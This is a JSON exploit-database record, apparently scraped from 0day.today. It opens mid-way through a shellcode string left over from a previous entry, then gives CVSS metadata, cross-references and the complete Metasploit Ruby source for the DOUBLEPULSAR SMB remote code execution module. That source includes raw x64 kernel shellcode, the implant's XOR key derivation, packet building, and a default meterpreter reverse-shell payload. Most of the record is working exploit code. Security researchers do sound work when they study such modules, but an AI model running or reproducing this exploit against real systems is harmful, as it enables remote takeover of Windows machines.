\"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-25] #"}, "lastseen": "2021-09-25T00:20:17", "differentElements": ["sourceData"], "edition": 24}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "609eefc4ea5704bbcd49620ff6d484e8", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-26T00:14:40", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96703", "SMNTC-96705", "SMNTC-96706", "SMNTC-96707", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-26T00:14:40", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-26T00:14:40", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n 